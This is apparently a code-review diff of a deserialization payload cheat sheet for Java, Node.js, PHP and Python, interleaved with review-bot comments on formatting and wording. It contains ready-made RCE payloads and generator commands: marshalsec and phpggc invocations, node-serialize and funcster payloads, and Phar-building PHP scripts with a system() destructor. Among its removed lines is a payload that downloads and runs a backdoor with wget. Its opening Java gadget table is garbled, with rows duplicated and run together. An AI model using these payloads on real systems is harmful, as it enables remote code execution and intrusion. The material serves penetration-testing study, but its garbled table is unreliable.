JRMPListener |@mbechler| Groovy1 @frohoff groovy:2.3.9
JSON1 |@mbechler |json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 Hibernate1 @mbechler
JavassistWeld1 |@matthias_kaiser |javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 Hibernate2 @mbechler
Jdk7u21 |@frohoff| JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jython1 |@pwntester, @cschneider4711 |jython-standalone:2.5.2 JRMPClient @mbechler
MozillaRhino1 |@matthias_kaiser |js:1.7R2 JRMPListener @mbechler
Myfaces1 |@mbechler| JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
Myfaces2 |@mbechler| JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
ROME |@mbechler |rome:1.0 Jdk7u21 @frohoff
Spring1 |@frohoff |spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
Spring2 |@mbechler |spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 MozillaRhino1 @matthias_kaiser js:1.7R2
URLDNS |@gebl| | jre only vuln detect MozillaRhino2 @_tint0 js:1.7R2
Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4 Myfaces1 @mbechler
Myfaces2 @mbechler
ROME @mbechler rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
URLDNS @gebl
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
```
Additional tools (integration ysoserial with Burp Suite): ### Burp extensions using ysoserial
- [JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller) - [JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller)
- [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner) - [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner)
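Review bot: the replacement payload list drops the `impact (if not RCE)` column of the old markdown table, so two facts disappear: `FileUpload1` yields file upload rather than code execution, and `URLDNS` is a JRE-only detection gadget (DNS lookup, no execution), which is exactly the one defenders and testers use for safe confirmation. Keep that column, or add a sentence after the list calling those two out. Fence languages are also off: the ysoserial invocations are shell command lines but remain in a ```java fence, and the new list is ysoserial's plain-text output rather than PowerShell, so ```bash and ```text would be accurate. Under Detection, the new `STREAM_MAGIC` / `STREAM_VERSION` sub-bullets use `*` while the surrounding list uses `-`.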
@@ -58,15 +70,63 @@ Additional tools (integration ysoserial with Burp Suite):
- [SuperSerial](https://github.com/DirectDefense/SuperSerial) - [SuperSerial](https://github.com/DirectDefense/SuperSerial)
- [SuperSerial-Active](https://github.com/DirectDefense/SuperSerial-Active) - [SuperSerial-Active](https://github.com/DirectDefense/SuperSerial-Active)
JRE8u20_RCE_Gadget ### Alternative Tooling
[https://github.com/pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget)
- [pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget)
- [joaomatosf/JexBoss](https://github.com/joaomatosf/jexboss) - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool
- [pimps/ysoserial-modified](https://github.com/pimps/ysoserial-modified)
- [NickstaDB/SerialBrute](https://github.com/NickstaDB/SerialBrute) - Java serialization brute force attack tool
- [NickstaDB/SerializationDumper](https://github.com/NickstaDB/SerializationDumper) - A tool to dump Java serialization streams in a more human readable form
- [bishopfox/gadgetprobe](https://labs.bishopfox.com/gadgetprobe)
- [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution
```java
$ java -cp marshalsec.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
$ java -cp marshalsec.jar marshalsec.JsonIO Groovy "cmd" "/c" "calc"
$ java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389
-a - generates/tests all payloads for that marshaller
-t - runs in test mode, unmarshalling the generated payloads after generating them.
-v - verbose mode, e.g. also shows the generated payload in test mode.
gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller.
arguments - Gadget specific arguments
```
Payload generators for the following marshallers are included:<br />
| Marshaller | Gadget Impact
| ------------------------------- | ----------------------------------------------
| BlazeDSAMF(0&#124;3&#124;X) | JDK only escalation to Java serialization<br/>various third party libraries RCEs
| Hessian&#124;Burlap | various third party RCEs
| Castor | dependency library RCE
| Jackson | **possible JDK only RCE**, various third party RCEs
| Java | yet another third party RCE
| JsonIO | **JDK only RCE**
| JYAML | **JDK only RCE**
| Kryo | third party RCEs
| KryoAltStrategy | **JDK only RCE**
| Red5AMF(0&#124;3) | **JDK only RCE**
| SnakeYAML | **JDK only RCEs**
| XStream | **JDK only RCEs**
| YAMLBeans | third party RCE
## Gadgets
Require:
* `java.io.Serializable`
JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)
## References ## References
- [Github - ysoserial](https://github.com/frohoff/ysoserial) - [Github - ysoserial](https://github.com/frohoff/ysoserial)
- [Triggering a DNS lookup using Java Deserialization - paranoidsoftware.com](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
- [Detecting deserialization bugs with DNS exfiltration - Philippe Arteau | Mar 22, 2017](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) - [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) - [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
- [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
- [On Jackson CVEs: Dont Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96)
- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)
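Review bot: the new `## Gadgets` section is a single `Require:` bullet naming `java.io.Serializable`, which reads as an unfinished placeholder; at minimum say that this is the entry condition rather than the full picture, and mention `java.io.Externalizable`, which `ObjectInputStream` reconstructs through the same path and is equally relevant when auditing a classpath. The marshalsec usage block is shell usage text inside a ```java fence, the marshaller table uses raw `<br />` and `&#124;` HTML inside markdown cells (a `\|` escape and separate rows would render the same without HTML), and the old `JexBoss` line that used to sit under Gadgets is now only in the Alternative Tooling list, which is fine but worth confirming was intentional.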

View File

@@ -0,0 +1,49 @@
# Node Deserialization
## Summary
* [Exploit](#exploit)
* [node-serialize](#node-serialize)
* [funcster](#funcster)
* [References](#references)
## Exploit
* In Node source code, look for:
* `node-serialize`
* `serialize-to-js`
* `funcster`
### node-serialize
> An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
1. Generate a serialized payload
```js
var y = {
rce : function(){
require('child_process').exec('ls /', function(error,
stdout, stderr) { console.log(stdout) });
},
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
```
2. Add bracket `()` to force the execution
```js
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
```
3. Send the payload
### funcster
```js
{"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}}
```
## References
* [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
* [NodeJS Deserialization - 8 January 2020- gonczor](https://blacksheephacks.pl/nodejs-deserialization/)
* [CVE-2017-5941 - NATIONAL VULNERABILITY DATABASE - 02/09/2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
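Review bot: the `## Exploit` bullet tells readers to look for `serialize-to-js`, but the file has no section for it and the Summary does not list it; either add a short section or remove it from the bullet so the summary matches the body. The `### funcster` section is a bare payload with no sentence saying what the `__js_function` key is or why appending `()` makes the deserializer run the function, so the Summary entry leads to nothing readable. In step 2, "Add bracket `()`" should read "Add parentheses `()`".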

View File

@@ -1,16 +1,28 @@
# PHP Object injection # PHP Deserialization
PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope. PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
The following magic methods will help you for a PHP Object injection The following magic methods will help you for a PHP Object injection
* __wakeup() when an object is unserialized. * `__wakeup()` when an object is unserialized.
* __destruct() when an object is deleted. * `__destruct()` when an object is deleted.
* __toString() when an object is converted to a string. * `__toString()` when an object is converted to a string.
Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phar) which use a PHP object injection. Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phar) which use a PHP object injection.
## __wakeup in the unserialize function
## Summary
* [General concept](#general-concept)
* [Authentication bypass](#authentication-bypass)
* [Object Injection](#object-injection)
* [Finding and using gadgets](#finding-and-using-gadgets)
* [Phar Deserialization](#phar-deserialization)
* [Real world examples](#real-world-examples)
* [References](#references)
## General concept
Vulnerable code: Vulnerable code:
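Review bot: the new `## Summary` block is inserted after the introduction and the three magic-method bullets, whereas the Node Deserialization README added in the same change places its Summary directly under the title; moving it up keeps the two files consistent and avoids a table of contents appearing mid-page. In the unchanged context, `which use a PHP object injection` should be `which uses`. The intro's magic-method list names only `__wakeup()`, `__destruct()` and `__toString()` while the `## Finding and using gadgets` section later in this file enumerates the full set; a pointer from the intro to that section would keep the two lists from drifting apart.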
@@ -38,7 +50,7 @@ Vulnerable code:
?> ?>
``` ```
Payload: Craft a payload using existing code inside the application.
```php ```php
# Basic serialized data # Basic serialized data
@@ -73,13 +85,13 @@ a:2:{s:8:"username";b:1;s:8:"password";b:1;}
Because `true == "str"` is true. Because `true == "str"` is true.
### Object reference ## Object Injection
Vulnerable code: Vulnerable code:
```php ```php
<?php <?php
class Object class ObjectExample
{ {
var $guess; var $guess;
var $secretCode; var $secretCode;
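Review bot: the rename from `class Object` to `class ObjectExample` deserves a sentence in the text: `object` became a reserved word in PHP 7.2, so the original example fails to parse on any current PHP and readers who copied it hit a fatal error rather than the behaviour the section describes. Stating the reason also explains why the serialized payload in the next hunk changes its class-name length from 6 to 13.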
@@ -99,40 +111,43 @@ if($obj) {
Payload: Payload:
```php ```php
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;} O:13:"ObjectExample":2:{s:10:"secretCode";N;s:5:"guess";R:2;}
``` ```
## Others exploits We can do an array like this:
Reverse Shell
```php ```php
class PHPObjectInjection a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
{
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
public $inject = "system('wget http://URL/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
}
echo urlencode(serialize(new PHPObjectInjection));
``` ```
Basic detection
```php
class PHPObjectInjection
{
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
public $inject = "system('cat /etc/passwd');";
}
echo urlencode(serialize(new PHPObjectInjection));
//O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A26%3A%22system%28%27cat+%2Fetc%2Fpasswd%27%29%3B%22%3B%7D
//'O:18:"PHPObjectInjection":1:{s:6:"inject";s:26:"system(\'cat+/etc/passwd\');";}'
```
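Review bot: the new array payload `a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}` is introduced only with "We can do an array like this:", which says nothing about what it achieves; add that `R:2` makes `hmac` a reference to `admin_hash`, so whatever value the application later assigns to one is seen through the other and an equality check between them passes, the same trick the `guess`/`secretCode` object above relies on. The corrected object payload also silently fixes a length bug in the old line (`s:4:"guess"` for a five-character key, now `s:5:"guess"`); a short note would tell readers who copied the old string why it never worked. Removing the `Basic detection` block drops the only example of the `urlencode(serialize(...))` output form, so consider keeping the encoded string as an illustration of what a payload looks like on the wire.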
## Finding and using gadgets ## Finding and using gadgets
[PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks: Also called `"PHP POP Chains"`, they can be used to gain RCE on the system.
* In PHP source code, look for `unserialize()` function.
* Interesting [Magic Methods](https://www.php.net/manual/en/language.oop5.magic.php) such as `__construct()`, `__destruct()`, `__call()`, `__callStatic()`, `__get()`, `__set()`, `__isset()`, `__unset()`, `__sleep()`, `__wakeup()`, `__serialize()`, `__unserialize()`, `__toString()`, `__invoke()`, `__set_state()`, `__clone()`, and `__debugInfo()`:
* `__construct()`: PHP allows developers to declare constructor methods for classes. Classes which have a constructor method call this method on each newly-created object, so it is suitable for any initialization that the object may need before it is used. [php.net](https://www.php.net/manual/en/language.oop5.decon.php#object.construct)
* `__destruct()`: The destructor method will be called as soon as there are no other references to a particular object, or in any order during the shutdown sequence. [php.net](https://www.php.net/manual/en/language.oop5.decon.php#object.destruct)
* `__call(string $name, array $arguments)`: The `$name` argument is the name of the method being called. The `$arguments` argument is an enumerated array containing the parameters passed to the `$name`'ed method. [php.net](https://www.php.net/manual/en/language.oop5.overloading.php#object.call)
* `__callStatic(string $name, array $arguments)`: The `$name` argument is the name of the method being called. The `$arguments` argument is an enumerated array containing the parameters passed to the `$name`'ed method. [php.net](https://www.php.net/manual/en/language.oop5.overloading.php#object.callstatic)
* `__get(string $name)`: `__get()` is utilized for reading data from inaccessible (protected or private) or non-existing properties. [php.net](https://www.php.net/manual/en/language.oop5.overloading.php#object.get)
* `__set(string $name, mixed $value)`: `__set()` is run when writing data to inaccessible (protected or private) or non-existing properties. [php.net](https://www.php.net/manual/en/language.oop5.overloading.php#object.set)
* `__isset(string $name)`: `__isset()` is triggered by calling `isset()` or `empty()` on inaccessible (protected or private) or non-existing properties. [php.net](https://www.php.net/manual/en/language.oop5.overloading.php#object.isset)
* `__unset(string $name)`: `__unset()` is invoked when `unset()` is used on inaccessible (protected or private) or non-existing properties. [php.net](https://www.php.net/manual/en/language.oop5.overloading.php#object.unset)
* `__sleep()`: `serialize()` checks if the class has a function with the magic name `__sleep()`. If so, that function is executed prior to any serialization. It can clean up the object and is supposed to return an array with the names of all variables of that object that should be serialized. If the method doesn't return anything then **null** is serialized and **E_NOTICE** is issued.[php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.sleep)
* `__wakeup()`: `unserialize()` checks for the presence of a function with the magic name `__wakeup()`. If present, this function can reconstruct any resources that the object may have. The intended use of `__wakeup()` is to reestablish any database connections that may have been lost during serialization and perform other reinitialization tasks. [php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.wakeup)
* `__serialize()`: `serialize()` checks if the class has a function with the magic name `__serialize()`. If so, that function is executed prior to any serialization. It must construct and return an associative array of key/value pairs that represent the serialized form of the object. If no array is returned a TypeError will be thrown. [php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.serialize)
* `__unserialize(array $data)`: this function will be passed the restored array that was returned from __serialize(). [php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.unserialize)
* `__toString()`: The __toString() method allows a class to decide how it will react when it is treated like a string [php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.tostring)
* `__invoke()`: The `__invoke()` method is called when a script tries to call an object as a function. [php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.invoke)
* `__set_state(array $properties)`: This static method is called for classes exported by `var_export()`. [php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.set-state)
* `__clone()`: Once the cloning is complete, if a `__clone()` method is defined, then the newly created object's `__clone()` method will be called, to allow any necessary properties that need to be changed. [php.net](https://www.php.net/manual/en/language.oop5.cloning.php#object.clone)
* `__debugInfo()`: This method is called by `var_dump()` when dumping an object to get the properties that should be shown. If the method isn't defined on an object, then all public, protected and private properties will be shown. [php.net](https://www.php.net/manual/en/language.oop5.magic.php#object.debuginfo)
[ambionics/phpggc](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks:
- Laravel - Laravel
- Symfony - Symfony
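Review bot: in the magic-method list, the `__unserialize()` bullet writes `__serialize()` without backticks while every other method name is in code font, the `__sleep()` bullet has no space before `[php.net]`, and the `__toString()` bullet has no terminating period. The line `Also called "PHP POP Chains"` wraps the quoted phrase in backticks, which renders it as code; plain quotes are enough, and "PHP POP Chains" should be introduced before the magic-method list rather than after the link to phpggc, since the list is what explains the term.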
@@ -144,8 +159,81 @@ echo urlencode(serialize(new PHPObjectInjection));
```powershell ```powershell
phpggc monolog/rce1 'phpinfo();' -s phpggc monolog/rce1 'phpinfo();' -s
phpggc monolog/rce1 assert 'phpinfo()'
phpggc swiftmailer/fw1 /var/www/html/shell.php /tmp/data
phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini
``` ```
## Phar Deserialization
Using `phar://` wrapper, one can trigger a deserialization on the specified file like in `file_get_contents("phar://./archives/app.phar")`.
A valid PHAR includes four elements:
1. **Stub**: The stub is a chunk of PHP code which is executed when the file is accessed in an executable context. At a minimum, the stub must contain `__HALT_COMPILER();` at its conclusion. Otherwise, there are no restrictions on the contents of a Phar stub.
2. **Manifest**: Contains metadata about the archive and its contents.
3. **File Contents**: Contains the actual files in the archive.
4. **Signature**(optional): For verifying archive integrity.
* Example of a Phar creation in order to exploit a custom `PDFGenerator`.
```php
<?php
class PDFGenerator { }
//Create a new instance of the Dummy class and modify its property
$dummy = new PDFGenerator();
$dummy->callback = "passthru";
$dummy->fileName = "uname -a > pwned"; //our payload
// Delete any existing PHAR archive with that name
@unlink("poc.phar");
// Create a new archive
$poc = new Phar("poc.phar");
// Add all write operations to a buffer, without modifying the archive on disk
$poc->startBuffering();
// Set the stub
$poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();");
/* Add a new file in the archive with "text" as its content*/
$poc["file"] = "text";
// Add the dummy object to the metadata. This will be serialized
$poc->setMetadata($dummy);
// Stop buffering and write changes to disk
$poc->stopBuffering();
?>
```
* Example of a Phar creation with a `JPEG` magic byte header since there is no restriction on the content of stub.
```php
<?php
class AnyClass {
public $data = null;
public function __construct($data) {
$this->data = $data;
}
function __destruct() {
system($this->data);
}
}
// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
// add object of any class as meta data
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();
```
## Real world examples ## Real world examples
* [Vanilla Forums ImportController index file_exists Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410237) * [Vanilla Forums ImportController index file_exists Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410237)
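Review bot: the `class PDFGenerator { }` stub in the first Phar example declares no properties, so `$dummy->callback` and `$dummy->fileName` are dynamic properties; on PHP 8.2+ that emits a deprecation notice, and the metadata only populates the real class on the target if the property names (and, for non-public ones, visibility) match, so declare `public $callback; public $fileName;` on the stub and say they mirror the target's class. In the second example, `AnyClass::__destruct()` calls `system($this->data)`, which means `whoami` runs on the machine generating the archive as soon as the script ends; a comment stating that the destructor fires locally during generation would spare readers a surprise. The phpggc commands are shell lines in a ```powershell fence, and `**Signature**(optional)` needs a space before the parenthesis.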
@@ -153,13 +241,23 @@ phpggc monolog/rce1 'phpinfo();' -s
* [Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical) - Steven Seeley](https://hackerone.com/reports/410882) * [Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical) - Steven Seeley](https://hackerone.com/reports/410882)
* [Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/407552) * [Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/407552)
## References ## References
* [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) * [Utilizing Code Reuse/ROP in PHP](https://owasp.org/www-pdf-archive/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf)
* [PHP unserialize](http://php.net/manual/en/function.unserialize.php) * [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
* [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
* [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf) * [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
* [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html) * [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html)
* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web) * [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://blog.raw.pm/en/meepwn-2017-write-ups/#TSULOTT-Web)
* [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d) * [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d)
* [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://blog.raw.pm/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web)
* [Rusty Joomla RCE Unserialize overflow - Alessandro Groppo - October 3, 2019](https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/)
* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
* [phar:// deserialization - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization)
* [Finding PHP Serialization Gadget Chain - DG'hAck Unserial killer - Aug 11, 2022 - xanhacks](https://www.xanhacks.xyz/p/php-gadget-chain/#introduction)
* [FINDING A POP CHAIN ON A COMMON SYMFONY BUNDLE: PART 1 - Rémi Matasse - 12/09/2023](https://www.synacktiv.com/publications/finding-a-pop-chain-on-a-common-symfony-bundle-part-1)
* [FINDING A POP CHAIN ON A COMMON SYMFONY BUNDLE: PART 2 - Rémi Matasse - 11/10/2023](https://www.synacktiv.com/publications/finding-a-pop-chain-on-a-common-symfony-bundle-part-2)
* [PHP deserialization attacks and a new gadget chain in Laravel - Mathieu Farrell - Tue 13 February 2024](https://blog.quarkslab.com/php-deserialization-attacks-and-a-new-gadget-chain-in-laravel.html)
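Review bot: the reference entries added at the end of this list mix date formats (`12/09/2023`, `11/10/2023`, `Aug 11, 2022`, `Tue 13 February 2024`), and the entry that replaces the Thin Ba Shane link (`Utilizing Code Reuse/ROP in PHP`) carries no author or date at all while its neighbours do; pick one date style, the `Month DD, YYYY` form already used by the older entries, and apply it to the new lines.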

View File

@@ -1,8 +1,15 @@
# Python Deserialization # Python Deserialization
* In Python source code, look for:
* `cPickle.loads`
* `pickle.loads`
* `_pickle.loads`
* `jsonpickle.decode`
## Pickle ## Pickle
The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object. The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
:warning: `import cPickle` will only work on Python 2
```python ```python
import cPickle import cPickle
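Review bot: the new "look for" list of sinks omits `pickle.load` (the file/stream counterpart of `pickle.loads`) and `pickle.Unpickler(...).load()`, which matter just as much when auditing source for untrusted deserialization; add them next to `pickle.loads` and `_pickle.loads`. The list also starts with a bare bullet (`* In Python source code, look for:`) directly under the H1, so it renders as a lone nested list rather than an introduction; a plain sentence or a small heading would read better.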
@@ -32,7 +39,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust
> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
```python ```python
import cPickle import cPickle, os
from base64 import b64encode, b64decode from base64 import b64encode, b64decode
class Evil(object): class Evil(object):
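Review bot: `import cPickle, os` puts two imports on one line; the rest of the snippet imports one module per statement, so split it into `import cPickle` and `import os` for consistency with PEP 8 and with the `from base64 import ...` line below it.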
@@ -47,4 +54,4 @@ print("Your Evil Token : {}").format(evil_token)
## References ## References
* [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/) * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) * [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)

View File

@@ -8,10 +8,35 @@ Check the following sub-sections, located in other files :
* [PHP (Object injection) : phpggc, ...](PHP.md) * [PHP (Object injection) : phpggc, ...](PHP.md)
* [Ruby : universal rce gadget, ...](Ruby.md) * [Ruby : universal rce gadget, ...](Ruby.md)
* [Python : pickle, ...](Python.md) * [Python : pickle, ...](Python.md)
* [YAML : PyYAML, ...](YAML.md)
* [.NET : ysoserial.net, ...](DotNET.md)
| Object Type | Header (Hex) | Header (Base64) |
|-----------------|--------------|-----------------|
| Java Serialized | AC ED | rO |
| .NET ViewState | FF 01 | /w |
| Python Pickle | 80 04 95 | gASV |
| PHP Serialized | 4F 3A | Tz |
## POP Gadgets
> A POP (Property Oriented Programming) gadget is a piece of code implemented by an application's class, that can be called during the deserialization process.
POP gadgets characteristics:
* Can be serialized
* Has public/accessible properties
* Implements specific vulnerable methods
* Has access to other "callable" classes
## Labs
* [Portswigger - Insecure Deserialization](https://portswigger.net/web-security/all-labs#insecure-deserialization)
* [NickstaDB/DeserLab - Java deserialization exploitation lab](https://github.com/NickstaDB/DeserLab)
## References ## References
* [Github - ysoserial](https://github.com/frohoff/ysoserial) * [Github - frohoff/ysoserial](https://github.com/frohoff/ysoserial)
* [Github - pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net)
